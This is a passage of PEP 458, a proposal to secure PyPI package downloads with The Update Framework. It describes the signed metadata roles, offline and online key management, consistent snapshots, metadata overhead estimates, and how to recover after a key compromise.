  • An attacker gives the software updater an older, insecure version of a file +that it already has, so it downloads that one and blindly uses it thinking it +is newer.
  • +
  • An attacker gives the software updater a newer version of a file, but +not the newest one. The file is newer to the software updater, but it +may be insecure and exploitable by the attacker.
  • +
  • An attacker compromises the key used to sign these files and now the software +updater downloads a malicious file that is properly signed.
  • +
+

TUF is designed to address these attacks, and others, by adding signed metadata +(text files that describe the repository’s files) to the repository and +referencing the metadata files during the update procedure. Repository files +are verified against the information included in the metadata before they are +handed off to the software update system. The framework also provides +multi-signature trust, explicit and implicit revocation of cryptographic keys, +responsibility separation of the metadata, and minimized key risk. For a full +list and outline of the repository attacks and software updater weaknesses +addressed by TUF, see Appendix A.

+
+
+

Integrating PyPI with TUF

+

A software update system must complete two main tasks to integrate with TUF. +First, the repository on the server side MUST be modified to provide signed +TUF metadata. This PEP is concerned with the first part of the integration, +and the changes on PyPI required to support software updates with TUF.

+

Second, it must add the framework to the client side of the update system. For +example, TUF MAY be integrated with the pip package manager. Thus, new versions +of pip going forward SHOULD use TUF by default to download and verify distributions +from PyPI before installing them. However, there may be unforeseen issues that +might prevent users from installing or updating distributions, including pip itself, +via TUF. Therefore, pip SHOULD provide an option e.g., +--unsafely-disable-package-verification, in order to work around such issues +until they are resolved. Note, the proposed option name is purposefully long, +because a user must be helped to understand that the action is unsafe and not +generally recommended.

+

We assume that pip would use TUF to verify distributions downloaded only from PyPI. +pip MAY support TAP 4 in order use TUF to also verify distributions downloaded +from elsewhere.

+
+

What Additional Repository Files are Required on PyPI?

+

In order for package managers like pip to download and verify distributions with +TUF, a few extra files MUST be added to PyPI. These extra repository files are +called TUF metadata, and they contain such information as which keys can be trusted, +the cryptographic hashes of files, signatures, metadata version numbers, and +the date after which the metadata should be considered expired.

+

When a package manager wants to check for updates, it asks TUF to do the work. +That is, a package manager never has to deal with this additional metadata or +understand what’s going on underneath. If TUF reports back that there are +updates available, a package manager can then ask TUF to download these files +from PyPI. TUF downloads them and checks them against the TUF metadata that it +also downloads from the repository. If the downloaded target files are +trustworthy, TUF then hands them over to the package manager.

+

The Document formats section of the TUF specification provides information +about each type of required metadata and its expected content. The next +section covers the different kinds of metadata RECOMMENDED for PyPI.

+

In addition, all target files SHOULD be available on disk at least two times. +Once under their original filename, to provide backwards compatibility, and +once with their SHA-512 hash included in their +filename. This is required to produce Consistent Snapshots.

+

Depending on the used file system different data deduplication mechanisms MAY +be employed to avoid storage increase from hard copies of target files.

+
+
+
+

PyPI and TUF Metadata

+

TUF metadata provides information that clients can use to make update +decisions. For example, a targets metadata lists the available target files +on PyPI and includes the required signatures, cryptographic hash, and +file sizes for each. Different metadata files provide different information, which are +signed by separate roles. The root role indicates what metadata belongs to +each role. The concept of roles allows TUF to delegate responsibilities +to multiple roles, thus minimizing the impact of any one compromised role.

+

TUF requires four top-level roles. These are root, timestamp, snapshot, +and targets. The root role specifies the public cryptographic keys of the +top-level roles (including its own). The timestamp role references the +latest snapshot and can signify when a new snapshot of the repository is +available. The snapshot role indicates the latest version of all the TUF +metadata files (other than timestamp). The targets role lists the file +paths of available target files together with their cryptographic hashes. +The file paths must be specified relative to a base URL. This allows the +actual target files to be served from anywhere, as long as the base URL +can be accessed by the client. Each top-level role will serve its +responsibilities without exception. Table 1 provides an overview of the +roles used in TUF.

+ + + + + + + + + + + + + + + + + + + + +
Roles and Responsibilities
rootThe root role is the locus of trust for the entire +repository. The root role signs the root.json metadata +file. This file indicates which keys are authorized for +each of the top-level roles, including for the root role +itself. The roles “root”, “snapshot”, “timestamp” and +“targets” must be specified and each has a list of public +keys.
targetsThe targets role is responsible for indicating which +target files are available from the repository. More +precisely, it shares the responsibility of providing +information about the content of updates. The targets +role signs targets.json metadata, and can delegate trust +for repository files to other roles (delegated roles).
delegated rolesIf the top-level targets role performs delegation, the +resulting delegated roles can then provide their own +metadata files. The format of the metadata files provided +by delegated targets roles is the same as that of +targets.json. As with targets.json, the latest version of +metadata files belonging to delegated roles are described +in the snapshot role’s metadata.
snapshotThe snapshot role is responsible for ensuring that +clients see a consistent repository state. It provides +repository state information by indicating the latest +versions of the top-level targets and delegated targets +metadata files on the repository in snapshot.json. root +and timestamp are not listed in snapshot.json, because +timestamp signs for its freshness, after snapshot.json +has been created, and root, which has all top-level keys, +is required ahead of time to trust any of the top-level +roles.
timestampThe timestamp role is responsible for providing +information about the timeliness of available updates. +Timeliness information is made available by frequently +signing a new timestamp.json file that has a short +expiration time. This file indicates the latest version +of snapshot.json.
+

Table 1: An overview of the TUF roles.

+

Unless otherwise specified, this PEP RECOMMENDS that every metadata or +target file be hashed using the SHA2-512 function of +the SHA-2 family. SHA-2 has native and well-tested Python 2 and 3 +support (allowing for verification of these hashes without additional, +non-Python dependencies). If stronger security guarantees are +required, then both SHA2-256 and SHA2-512 or both SHA2-256 and SHA3-256 +MAY be used instead. SHA2-256 and SHA3-256 +are based on very different designs from each other, providing extra protection +against collision attacks. However, SHA-3 +requires installing additional, non-Python dependencies for Python 2.

+
+

Signing Metadata and Repository Management

+

The top-level root role signs for the keys of the top-level timestamp, +snapshot, targets, and root roles. The timestamp role signs for every +new snapshot of the repository metadata. The snapshot role signs for root, +targets, and all delegated targets roles. The delegated targets role bins +further delegates to the bin-n roles, which sign for all distribution files +belonging to registered PyPI projects.

+

Figure 1 provides an overview of the roles available within PyPI, which +includes the top-level roles and the roles delegated to by targets. The figure +also indicates the types of keys used to sign each role, and which roles are +trusted to sign for files available on PyPI. The next two sections cover the +details of signing repository files and the types of keys used for each role.

+../_images/pep-0458-1.png +

Figure 1: An overview of the role metadata available on PyPI.

+

The roles that change most frequently are timestamp, snapshot and roles +delegated to by bins (i.e., bin-n). The timestamp and snapshot +metadata MUST be updated whenever root, targets or delegated metadata are +updated. Observe, though, that root and targets metadata are much less +likely to be updated as often as delegated metadata. Similarly, the bins role +will only be updated when a bin-n role is added, updated, or removed. Therefore, timestamp, +snapshot, and bin-n metadata will most likely be updated frequently (possibly every +minute) due to delegated metadata being updated frequently in order to support +continuous delivery of projects. Continuous delivery is a set of processes +that PyPI uses to produce snapshots that can safely coexist and be deleted +independent of other snapshots [18].

+

Every year, PyPI administrators SHOULD sign for root and targets role keys. +Automation will continuously sign for a timestamped snapshot of all projects. A +repository Metadata API is available that can be used to manage a TUF +repository.

+

In standard operation, the bin-n metadata will be updated and signed as new +distributions are uploaded to PyPI. However, there will also need to be a +one-time online initialization mechanism to create and sign bin-n metadata for +all existing distributions that are part of the PyPI repository every time PyPI +is re-initialized.

+
+
+

How to Establish Initial Trust in the PyPI Root Keys

+

Package managers like pip MUST ship the root metadata file with the +installation files that users initially download. This includes information +about the keys trusted for all top-level roles (including the root keys themselves). +Package managers must also bundle a TUF client library. Any new version of root +metadata that the TUF client library may download is verified against the root keys +initially bundled with the package manager. If a root key is compromised, +but a threshold of keys are still secured, then PyPI administrators MUST push new +root metadata that revokes trust in the compromised keys. If a threshold of root +keys are compromised, then the root metadata MUST be updated out-of-band. +(However, the threshold of root keys should be chosen so that this event is extremely +unlikely.) Package managers do not necessarily need to be updated immediately if root +keys are revoked or added between new releases of the package manager, as the TUF update +process automatically handles cases where a threshold of previous root keys sign +for new root keys (assuming no backwards-incompatibility in the TUF specification +used). So, for example, if a package manager was initially shipped with version 1 of +the root metadata, and a threshold of root keys in version 1 signed version 2 of +the root metadata, and a threshold of root keys in version 2 signed version 3 of +the root metadata, then the package manager should be able to transparently update +its copy of the *root metadata from version 1 to 3 using its TUF client library.

+

Thus, to repeat, the latest good copy of root metadata and a TUF client library MUST +be included in any new version of pip shipped with CPython (via ensurepip). The TUF +client library inside the package manager then loads the root metadata and downloads +the rest of the roles, including updating the root metadata if it has changed. +An outline of the update process is available.

+
+
+

Minimum Security Model

+

There are two security models to consider when integrating TUF into PyPI. The +one proposed in this PEP is the minimum security model, which supports +verification of PyPI distributions signed with private cryptographic +keys stored on PyPI. Distributions uploaded by developers are signed by PyPI +and immediately available for download. A possible future extension to this +PEP, discussed in PEP 480, proposes the maximum security model and allows +a developer to sign for their project. Developer keys are not stored online: +therefore, projects are safe from PyPI compromises.

+

The minimum security model requires no action from a developer and protects +against malicious CDNs [19] and public mirrors. To support continuous +delivery of uploaded distributions, PyPI signs for projects with an online key. +This level of security prevents projects from being accidentally or +deliberately tampered with by a mirror or a CDN because neither will +have any of the keys required to sign for projects. However, it does not +protect projects from attackers who have compromised PyPI, since they can +then manipulate TUF metadata using the keys stored online.

+

This PEP proposes that the bin-n roles sign for all PyPI projects with online +keys. These bin-n roles MUST all be delegated by the upper-level bins role, +which is signed with an offline key, and in turn MUST be delegated by the +top-level targets role, which is also signed with an offline key. +This means that when a package manager such as pip (i.e., using TUF) downloads +a distribution file from a project on PyPI, it will consult the targets role about +the TUF metadata for that distribution file. If ultimately no bin-n roles +delegated by targets via bins specify the distribution file, then it is +considered to be non-existent on PyPI.

+

Note, the reason why targets does not directly delegate to bin-n, but +instead uses the intermediary bins role, is so that other delegations can +easily be added or removed, without affecting the bins-to-bin-n mapping. +This is crucial for the implementation of PEP 480.

+
+
+

Metadata Expiry Times

+

The metadata for the root, targets, and bins roles SHOULD each expire in +one year, because these metadata files are expected to change very rarely.

+

The timestamp, snapshot, and bin-n metadata SHOULD each expire in one day +because a CDN or mirror SHOULD synchronize itself with PyPI every day. +Furthermore, this generous time frame also takes into account client clocks +that are highly skewed or adrift.

+
+
+

Metadata Scalability

+

As the number of projects and distributions on a repository grows, TUF metadata will need to +grow correspondingly. For example, consider the bins role. In August 2013, +it was found that the size of the bins metadata was about 42MB if the bins +role itself signed for about 220K PyPI targets (which are simple indices and +distributions). This PEP does not delve into the details, but TUF features a +so-called “hashed bin delegation” scheme that splits a large targets metadata file +into many small ones. This allows a TUF client updater to intelligently +download only a small number of TUF metadata files in order to update any +project signed for by the bins role. For example, applying this scheme to +the previous repository resulted in pip downloading between 1.3KB and 111KB to +install or upgrade a PyPI project via TUF.

+

Based on our findings as of the time this document was updated for +implementation (Nov 7 2019), summarized in Tables 2-3, PyPI SHOULD +split all targets in the bins role by delegating them to 16,384 +bin-n roles (see C10 in Table 2). Each bin-n role would sign +for the PyPI targets whose SHA2-512 hashes fall into that bin +(see Figure 1 and Consistent Snapshots). It was found +that this number of bins would result in a 5-9% metadata overhead +(relative to the average size of downloaded distribution files; see V13 and +V15 in Table 3) for returning users, and a 69% overhead for new +users who are installing pip for the first time (see V17 in Table 3).

+

A few assumptions used in calculating these metadata overhead percentages:

+
    +
  1. We are ignoring root, timestamp, and top-level targets metadata.
  2. +
  3. pip will always be bundled with the latest good copy of metadata for all +roles.
  4. +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameDescriptionValue
C1# of bytes in a SHA2-512 hexadecimal digest128
C2# of bytes for a SHA2-512 public key ID64
C3# of bytes for an Ed25519 signature128
C4# of bytes for an Ed25519 public key64
C5# of bytes for a target relative file path256
C6# of bytes to encode a target file size7
C7# of bytes to encode a version number6
C8# of targets (simple indices and distributions)2,273,539
C9Average # of bytes for a downloaded distribution2,184,393
C10# of bins16,384
+

C8 was computed by querying the number of release files. +C9 was derived by taking the average between a rough estimate of the average +size of release files downloaded over the past 31 days (1,628,321 bytes), +and the average size of releases files on disk (2,740,465 bytes). +Ee Durbin helped to provide these numbers on November 7, 2019.

+

Table 2: A list of constants used to calculate metadata overhead.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameDescriptionFormulaValue
V1Length of a path hash prefixmath.ceil(math.log(C10, 16))4
V2Total # of path hash prefixes16**V165,536
V3Avg # of targets per binmath.ceil(C8/C10)139
V4Avg size of SHA-512 hashes per binV3*C117,792
V5Avg size of target paths per binV3*C535,584
V6Avg size of lengths per binV3*C6973
V7Avg size of bin-n metadata (bytes)V4+V5+V654,349
V8Total size of public key IDs in binsC10*C21,048,576
V9Total size of path hash prefixes in binsV1*V2262,144
V10Est. size of bins metadata (bytes)V8+V91,310,720
V11Est. size of snapshot metadata (bytes)C10*C798,304
V12Est. size of metadata overhead per distribution per returning user (same snapshot)2*V7108,698
V13Est. metadata overhead per distribution per returning user (same snapshot)round((V12/C9)*100)5%
V14Est. size of metadata overhead per distribution per returning user (diff snapshot)V12+V11207,002
V15Est. metadata overhead per distribution per returning user (diff snapshot)round((V14/C9)*100)9%
V16Est. size of metadata overhead per distribution per new userV14+V101,517,722
V17Est. metadata overhead per distribution per new userround((V16/C9)*100)69%
+

Table 3: Estimated metadata overheads for new and returning users.

+

The interested reader may find an interactive version of the metadata overhead +calculator here:

+

This number of bins SHOULD increase when the metadata overhead for returning +users exceeds 50%. Presently, this SHOULD happen when the number of targets +increase at least 10x from over 2M to over 22M, at which point the metadata +overhead for returning and new users would be around 50-54% and 114% +respectively, assuming that the number of bins stay fixed. If the number of +bins is increased, then the cost for all users would effectively be the cost +for new users, because their cost would be dominated by the (once-in-a-while) +cost of downloading the large number of delegations in the bins metadata. +If the cost for new users should prove to be too much, primarily due to the +overhead of downloading the bins metadata, then this subject SHOULD be +revisited before that happens.

+

Note that changes to the number of bins on the server are transparent to the +client. The package manager will be required to download a fresh set of +metadata, as though it were a new user, but this operation will not require any +explicit code logic or user interaction in order to do so.

+

It is possible to make TUF metadata more compact by representing it in a binary +format, as opposed to the JSON text format. Nevertheless, a sufficiently large +number of projects and distributions will introduce scalability challenges at +some point, and therefore the bins role will still need delegations (as +outlined in Figure 1) in order to address the problem. The JSON format is an +open and well-known standard for data interchange, which is already supported by +the TUF reference implementation, and therefore the recommended data format by +this PEP. However, due to the large number of delegations, compressed +versions of all metadata SHOULD also be made available to clients via the +existing Warehouse mechanisms for HTTP compression. In addition, the JSON +metadata could be compressed before being sent to clients. The TUF reference +implementation does not currently support downloading compressed JSON metadata, +but this could be added to reduce the metadata size.

+
+
+
+

PyPI and Key Requirements

+

In this section, the kinds of keys required to sign for TUF roles on PyPI are +examined. TUF is agnostic with respect to choices of digital signature +algorithms. However, this PEP RECOMMENDS that all digital signatures be +produced with the Ed25519 algorithm [15]. Ed25519 has native and +well-tested Python support (allowing for verification of signatures without +additional, non-Python dependencies), uses small keys, and is supported +by modern HSM and authentication token hardware.

+ +
+

Managing online keys

+

The online key shared by the timestamp, snapshot, and all bin-n roles +MAY be stored, encrypted or not, on the Python infrastructure. For example, +the key MAY be kept on a self-hosted key management service (e.g. Hashicorp +Vault), or a third-party one (e.g. AWS KMS, Google Cloud KMS, or Azure +Key Vault).

+

Some of these key management services allow keys to be stored on Hardware +Security Modules (HSMs) (e.g., Hashicorp Vault, AWS CloudHSM, Google +Cloud HSM, Azure Key Vault). This prevents attackers from exfiltrating +the online private key (albeit not from using it, although their actions +may now be cryptographically auditable). However, this requires modifying +the reference TUF implementation to support HSMs (WIP).

+

Regardless of where and how this online key is kept, its use SHOULD be +carefully logged, monitored, and audited, ideally in such a manner that +attackers who compromise PyPI are unable to immediately turn off this logging, +monitoring, and auditing.

+
+
+

Managing offline keys

+

As explained in the previous section, the root, targets, and bins role +keys MUST be offline for maximum security. These keys will be offline in the +sense that their private keys MUST NOT be stored on PyPI, though some of them +MAY be online in the private infrastructure of the project.

+

There SHOULD be an offline key ceremony to generate, backup, and store these +keys in such a manner that the private keys can be read only by the Python +administrators when necessary (e.g., such as rotating the keys for the +top-level TUF roles). Thus, keys SHOULD be generated, preferably in a physical +location where side-channel attacks are not a concern, using:

+
    +
  1. A trusted, airgapped computer with a true random number generator, and +with no data persisting after the ceremony
  2. +
  3. A trusted operating system
  4. +
  5. A trusted set of third-party packages (such as updated versions of +cryptographic libraries or the TUF reference implementation, where the +versions provided by the trusted operating system are not recent enough)
  6. +
+

In order to avoid the persistence of sensitive data (e.g., private keys) other than +on backup media after the ceremony, offline keys SHOULD be generated +encrypted using strong passwords, either on (in decreasing order of trust): +private HSMs (e.g., YubiHSM), cloud-based HSMs (e.g., those listed above), +in volatile memory (e.g., RAM), or in nonvolatile memory +(e.g., SSD or microSD). If keys must be generated on nonvolatile memory, +then this memory MUST be irrecoverably destroyed after having securely +backed up the keys.

+

Passwords used to encrypt keys SHOULD be stored somewhere durable and +trustworthy to which only Python admins have access.

+

In order to minimize OPSEC errors during the ceremony, scripts SHOULD be +written, for execution on the trusted key-generation computer, to automate +tedious steps of the ceremony, such as:

+
    +
  • Exporting to sneakernet all code and data (previous TUF metadata and root +keys) required to generate new keys and replace old ones
  • +
  • Tightening the firewall, updating the entire operating system in order to +fix security vulnerabilities, and airgapping the computer
  • +
  • Exporting all new TUF metadata and keys to encrypted backup media. +This backup provides a complete copy of the data required to restore the PyPI +TUF repository
  • +
  • Exporting only new TUF metadata and online keys to encrypted backup media. +This backup provides all online data for import into the PyPI infrastructure +and is useful, e.g., when the online data needs to be restored from a previous +archived state
  • +
  • Printing and saving cryptographic hashes of new TUF metadata. This printed copy +provides an additional offline paper backup, which can be used as a comparison +in the case of a compromise
  • +
+

Note the one-time keys for the targets and bins roles MAY be safely +generated, used, and deleted during the offline key ceremony. Furthermore, +the root keys MAY not be generated during the offline key ceremony itself. +Instead, a threshold t of n Python administrators, as discussed above, MAY +independently sign the root metadata after the offline key ceremony used +to generate all other keys.

+
+
+
+

How Should Metadata be Generated?

+

Project developers expect the distributions they upload to PyPI to be +immediately available for download. Unfortunately, there will be problems when +many readers and writers simultaneously access the same metadata and +target files. That is, there needs to be a way to ensure consistency of +metadata and target files when multiple developers simultaneously change these +files. There are also issues with consistency on PyPI +without TUF, but the problem is more severe with signed metadata that MUST keep +track of the files available on PyPI in real-time.

+

Suppose that PyPI generates a snapshot that indicates the latest version of +every metadata, except timestamp, at version 1 and a client requests this +snapshot from PyPI. While the client is busy downloading this snapshot, +PyPI then timestamps a new snapshot at, say, version 2. Without ensuring +consistency of metadata, the client would find itself with a copy of snapshot +that disagrees with what is available on PyPI. The result would be indistinguishable from +arbitrary metadata injected by an attacker. The problem would also occur with +mirrors attempting to sync with PyPI.

+
+

Consistent Snapshots

+

To keep TUF metadata on PyPI consistent with the highly volatile target files, +consistent snapshots SHOULD be used. Each consistent snapshot captures the +state of all known projects at a given time and MAY safely coexist with any +other snapshot, or be deleted independently, without affecting any other +snapshot.

+

To maintain consistent snapshots, all TUF metadata MUST, when written to disk, +include a version number in their filename:

+
+
+
VERSION_NUMBER.ROLENAME.json,
where VERSION_NUMBER is an incrementing integer, and ROLENAME is one of the +top-level metadata roles – root, snapshot or targets – or one of +the delegated targets roles – bins or bin-n.
+
+
+

The only exception is the timestamp metadata file, whose version would not be known +in advance when a client performs an update. The timestamp metadata +lists the +version of the snapshot metadata, which in turn lists the versions of the +targets and delegated targets metadata, all as part of a given consistent +snapshot.

+

In normal usage, version number overflow is unlikely to occur. An 8-byte integer, +for instance, can be incremented once per millisecond and last almost 300 million +years. If an attacker increases the version number arbitrarily, the repository +can recover by revoking the compromised keys and resetting the version number as +described in the TUF specification.

+

The targets or delegated targets metadata refer to the actual target +files, including their cryptographic hashes as specified above. +Thus, to mark a target file as part of a consistent snapshot it MUST, when +written to disk, include its hash in its filename:

+
+
+
HASH.FILENAME
where HASH is the hex digest of the hash of the file contents and +FILENAME is the original filename.
+
+
+

This means that there MAY be multiple copies of every target file, one for each +of the cryptographic hash functions specified above.

+

Assuming infinite disk space, strictly incrementing version numbers, and no +hash collisions, a client may safely read from one snapshot while PyPI +produces another snapshot.

+

Clients, such as pip, that use the TUF protocol MUST be modified to download +every metadata and target file, except for timestamp metadata. This is done +by including, in the file request, the version of the file (for metadata), +or the cryptographic hash of the file (for target files) in the filename.

+

In this simple but effective manner, PyPI is able to capture a consistent +snapshot of all projects and the associated metadata at a given time. The next +subsection provides implementation details of this idea.

+

Note: This PEP does not prohibit using advanced file systems or tools to +produce consistent snapshots. There are two important reasons for proposing a simple solution in this PEP. +First, the solution does not mandate that PyPI +use any particular file system or tool. Second, the generic file-system based +approach allows mirrors to use extant file transfer tools, such as rsync, to +efficiently transfer consistent snapshots from PyPI.

+
+
+

Producing Consistent Snapshots

+

When a new distribution file is uploaded to PyPI, PyPI MUST update the +responsible bin-n metadata. Remember that all target files are sorted into +bins by their filename hashes. PyPI MUST also update snapshot to account for +the updated bin-n metadata, and timestamp to account for the updated +snapshot metadata. These updates SHOULD be handled by an automated snapshot +process.

+

File uploads MAY be handled in parallel, however, consistent snapshots MUST be +produced in a strictly sequential manner. Furthermore, as long as distribution +files are self-contained, a consistent snapshot MAY be produced for each +uploaded file. To do so upload processes place new distribution files into a +concurrency-safe FIFO queue and the snapshot process reads from that queue one +file at a time and performs the following tasks:

+

First, it adds the new file path to the relevant bin-n metadata, increments +its version number, signs it with the bin-n role key, and writes it to +VERSION_NUMBER.bin-N.json.

+

Then, it takes the most recent snapshot metadata, updates its bin-n +metadata version numbers, increments its own version number, signs it with the +snapshot role key, and writes it to VERSION_NUMBER.snapshot.json.

+

And finally, the snapshot process takes the most recent timestamp metadata, +updates its snapshot metadata hash and version number, increments its own +version number, sets a new expiration time, signs it with the timestamp role +key, and writes it to timestamp.json.

+

When updating bin-n metadata for a consistent snapshot, the snapshot process +SHOULD also include any new or updated hashes of simple index pages in the +relevant bin-n metadata. Note that, simple index pages may be generated +dynamically on API calls, so it is important that their output remains stable +throughout the validity of a consistent snapshot.

+

Since the snapshot process MUST generate consistent snapshots in a strictly +sequential manner it constitutes a bottleneck. Fortunately, the operation of +signing is fast enough that this may be done a thousand or more times per +second.

+

Moreover, PyPI MAY serve distribution files to clients before the corresponding +consistent snapshot metadata is generated. In that case the client software +SHOULD inform the user that full TUF protection is not yet available but will +be shortly.

+

PyPI SHOULD use a transaction log to record upload processes and the +snapshot queue for auditing and to recover from errors after a server failure.

+
+
+

Cleaning up old metadata

+

To avoid running out of disk space due to the constant production of new +consistent snapshots, PyPI SHOULD regularly delete old consistent snapshots, +i.e. metadata and target files that were obsoleted some reasonable time in +the past, such as 1 hour.

+

In order to preserve the latest consistent snapshot PyPI MAY use a +“mark-and-sweep” algorithm. That is, walk from the root of the latest +consistent snapshot, i.e. timestamp over snapshot over targets and +delegated targets until the target files, marking all visited files, and +delete all unmarked files. The last few consistent snapshots may be preserved +in a similar fashion.

+

Deleting a consistent snapshot will cause clients to see nothing except HTTP +404 responses to any request for a file within that consistent snapshot. +Clients SHOULD then retry their requests (as before) with the latest consistent +snapshot.

+

Note that root metadata, even though versioned, is not part of any consistent +snapshot. PyPI MUST NOT delete old versions of root metadata. This guarantees +that clients can update to the latest root role keys, no matter how outdated +their local root metadata is.

+
+
+
+

Revoking Trust in Projects and Distributions

+

From time to time either a project or a distribution will need to be revoked. +To revoke trust in either a project or a distribution, the associated bin-n +role can simply remove the corresponding targets and re-sign the bin-n +metadata. This action only requires actions with the online bin-n key.

+
+
+

Key Compromise Analysis

+

This PEP has covered the minimum security model, the TUF roles that should be +added to support continuous delivery of distributions, and how to generate and +sign the metadata for each role. The remaining sections discuss how PyPI +SHOULD audit repository metadata, and the methods PyPI can use to detect and +recover from a PyPI compromise.

+

Table 4 summarizes a few of the attacks possible when a threshold number of +private cryptographic keys (belonging to any of the PyPI roles) are +compromised. The leftmost column lists the roles (or a combination of roles) +that have been compromised, and the columns to its right show whether the +compromised roles leave clients susceptible to malicious updates, a freeze +attack, or metadata inconsistency attacks. Note that if the timestamp, snapshot, +and bin-n roles are stored in the same online location, a compromise of one +means they will all be compromised. Therefore, the table considers these +roles together. A version of this table that considers these roles separately +is included in PEP 480.

+ + + + + + + + + + + + + + + + + + + +
Role CompromiseMalicious UpdatesFreeze AttackMetadata Inconsistency Attacks
targets +OR +binsNO +timestamp and snapshot need to cooperate
timestamp +AND +snapshot +AND +bin-nYES +limited by earliest root, targets, or bins metadata expiry time
rootYES
+

Table 4: Attacks possible by compromising certain combinations of role keys. +In September 2013, it was shown how the latest version (at the time) of pip +was susceptible to these attacks and how TUF could protect users against them +[14].

+

Note that compromising targets or bins +does not immediately allow an attacker to serve malicious +updates. The attacker must also compromise the timestamp and snapshot +roles, which are both online and therefore more likely to be compromised. +This means that, in order to launch any attack, one must not only be able to +act as a man-in-the-middle, but also compromise the timestamp key (or +compromise the root keys and sign a new timestamp key). To launch any +attack other than a freeze attack, one must also compromise the snapshot key. +In practice, this PEP recommends storing the snapshot, timestamp, and +bin-n keys together, or even using the same key for all of these roles. +Because of this, the attacker only needs to compromise this single server to +perform any of the attacks listed above. Note that clients are still protected +against compromises of non-signing infrastructure such as CDNs or mirrors. +Moreover, the offline root key will +allow the repository to recover from an attack by revoking the online key(s).

+

The maximum security model shows how TUF mitigates online key compromises by +introducing additional roles for end-to-signing. Details about how to generate +developer keys and sign upload distributions are provided in PEP 480.

+
+

In the Event of a Key Compromise

+

A key compromise means that a threshold of keys (belonging to the metadata +roles on PyPI), as well as the PyPI infrastructure have been compromised and +used to sign new metadata on PyPI.

+

If a threshold number of timestamp, snapshot, targets, bins or bin-n +keys have been compromised, then PyPI MUST take the following steps:

+
    +
  1. Revoke the timestamp, snapshot and targets role keys from +the root role. This is done by replacing the compromised timestamp, +snapshot and targets keys with newly issued keys.
  2. +
  3. Revoke the bins keys from the targets role by replacing their keys with +newly issued keys. Sign the new targets role metadata and discard the new +keys (because, as explained earlier, this increases the security of +targets metadata).
  4. +
  5. All targets of the bin-n roles SHOULD be compared with the last known +good consistent snapshot in which none of the timestamp, snapshot, +bins or bin-n keys +were known to have been compromised. Added, updated or deleted targets in +the compromised consistent snapshot that do not match the last known good +consistent snapshot MAY be restored to their previous versions. After +ensuring the integrity of all bin-n targets, their keys should be renewed +in the bins metadata.
  6. +
  7. The bins and bin-n metadata MUST have their version numbers incremented, +expiry times suitably extended, and signatures renewed.
  8. +
  9. A new timestamped consistent snapshot MUST be issued.
  10. +
+

Following these steps would preemptively protect all of these roles, even if +only one of them may have been compromised.

+

If a threshold number of root keys have been compromised, then PyPI MUST take +the above steps and also replace all root keys in the root role.

+

It is also RECOMMENDED that PyPI sufficiently document compromises with +security bulletins. These security bulletins will be most informative when +users of pip-with-TUF are unable to install or update a project because the +keys for the timestamp, snapshot or root roles are no longer valid. They +could then visit the PyPI web site to consult security bulletins that would +help to explain why they are no longer able to install or update, and then take +action accordingly. When a threshold number of root keys have not been +revoked due to a compromise, then new root metadata may be safely updated +because a threshold number of existing root keys will be used to sign for the +integrity of the new root metadata. TUF clients will be able to verify the +integrity of the new root metadata with a threshold number of previously +known root keys. This will be the common case. Otherwise, in the worst +case, in which a threshold number of root keys have been revoked due to a +compromise, an end-user may choose to update new root metadata with +out-of-band mechanisms.

+
+
+

Auditing Snapshots

+

If a malicious party compromises PyPI, they can sign arbitrary files with any +of the online keys. The roles with offline keys (i.e., root, targets and bins) +are still protected. To safely recover from a repository compromise, snapshots +should be audited to ensure files are only restored to trusted versions.

+

When a repository compromise has been detected, the integrity of three types of +information must be validated:

+
    +
  1. If the online keys of the repository have been compromised, they can be +revoked by having the targets role sign new metadata delegating to a new +key.
  2. +
  3. If the role metadata on the repository has been changed, this would impact +the metadata that is signed by online keys. Any role information created +since the last period should be discarded. As a result, developers of new +projects will need to re-register their projects.
  4. +
  5. If the target files themselves may have been tampered with, they can be +validated using the stored hash information for target files that existed +at the time of the last period.
  6. +
+

In order to safely restore snapshots in the event of a compromise, PyPI SHOULD +maintain a small number of its own mirrors to copy PyPI snapshots according to +some schedule. The mirroring protocol can be used immediately for this +purpose. The mirrors must be secured and isolated such that they are +responsible only for mirroring PyPI. The mirrors can be checked against one +another to detect accidental or malicious failures.

+

Another approach is to generate the cryptographic hash of snapshot +periodically and tweet it. Perhaps a user comes forward with the actual +metadata and the repository maintainers can verify the metadata file’s cryptographic +hash. Alternatively, PyPI may periodically archive its own versions of +snapshot rather than rely on externally provided metadata. In this case, +PyPI SHOULD take the cryptographic hash of every target file on the +repository and store this data on an offline device. If any target file +hash has changed, this indicates an attack.

+

As for attacks that serve different versions of metadata, or freeze a version +of a distribution at a specific version, they can be handled by TUF with techniques +like implicit key revocation and metadata mismatch detection [2].

+
+
+
+

Managing Future Changes to the Update Process

+

If breaking changes are made to the update process, PyPI should implement these +changes without disrupting existing clients. For general guidance on how to do +so, see the ongoing discussion in the TAP repository.

+

Note that the changes to PyPI from this PEP will be backwards compatible. The +location of target files and simple indices are not changed in this PEP, so any +existing PyPI clients will still be able to perform updates using these files. +This PEP adds the ability for clients to use TUF metadata to improve the +security of the update process.

+
+

Hash Algorithm Transition Plan

+

If the algorithm used to hash target and metadata files becomes vulnerable, it +SHOULD be replaced by a stronger hash algorithm.

+

The TUF metadata format allows to list digests from different hash algorithms +alongside each other, together with an algorithm identifier, so that clients +can seamlessly switch between algorithms.

+

However, once support for an old algorithm is turned off, clients that don’t +support the new algorithm will only be able to install or update packages, +including the client itself, by disabling TUF verification. To allow clients to +transition without temporarily losing TUF security guarantees, we recommend +the following procedure.

+
    +
  1. Implement new algorithm in Warehouse.
  2. +
  3. Regenerate existing, unexpired TUF metadata to include hashes using both the +old and new algorithms. All new metadata going forward shall list both hash +algorithms. +Note, only TUF metadata that lists hash digests for target files or other +metadata needs to be renewed, that is bin-n, snapshot and timestamp. +Thus, only online keys are required to sign renewed metadata.
  4. +
  5. Announce transition on high-visibility channels, such as packaging on +Python Discourse and the PyPI changes mailing list.
  6. +
  7. Give popular clients such as pip and bandersnatch the chance to adopt new +hash algorithm.
  8. +
  9. Give end-users the chance to update clients.
  10. +
  11. Get rough consensus to remove old hash algorithm from PyPI maintainers.
  12. +
  13. Remove Warehouse support for old algorithm and only support new algorithm.
  14. +
+
+
+
+

Appendix A: Repository Attacks Prevented by TUF

+
    +
